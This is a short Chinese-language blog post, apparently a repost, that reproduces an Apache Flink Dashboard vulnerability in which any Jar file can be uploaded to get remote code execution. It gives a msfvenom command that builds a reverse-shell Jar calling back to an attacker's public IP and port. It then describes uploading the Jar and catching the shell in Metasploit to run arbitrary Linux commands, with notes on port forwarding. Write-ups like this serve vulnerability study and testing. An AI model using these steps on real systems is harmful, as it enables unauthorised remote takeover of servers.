0X01.漏洞原理

攻击者可利用该漏洞在 Apache Flink Dashboard页面中上传任意Jar包，利用Metasploit在Apache Flink服务器中执行任意代码，获取服务器最高权限，所以危害性较大。

0X02.漏洞复现

需要生成一个公网的IP地址exploit才能正常接收到msf反射的shell通道。使用端口转发工具在内网与公网之间形成映射

有了公网IP，现在可以用这个POC生成Jar包

msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f jar >fuck.jar

上传jar包后，在msfexploit中Set LHOST,SET PORT后，点击submit

成功监听。执行任意LINUX命令

POC中的Lhost，LPort 为公网IP与端口。

MsfExploit中的Lhost Lport为Localhost和与公网端口有映射关系的的本地监听端口。

1.使用NC监听失败，原因未知，msfexploit正常
2.下次尝试使用端口转发工具反弹shell

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 Apache Flink 任意 Jar 包上传致 RCE 漏洞复现 Apache Flink Dashboard未授权访问导致任意Jar包上传漏洞「漏洞预警」Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现 Apache Flink 任意jar文件上传+执行通达OA任意文件删除/OA未授权访问+任意文件上传RCE漏洞复现通达OA任意文件删除/OA未授权访问+任意文件上传RCE漏洞复现 nexus的jar包上传与下载 Apache Shiro 小于1.2.4 RCE 漏洞复现 Apache Solr JMX服务 RCE 漏洞复现 Apache-Log4j2-Rce漏洞复现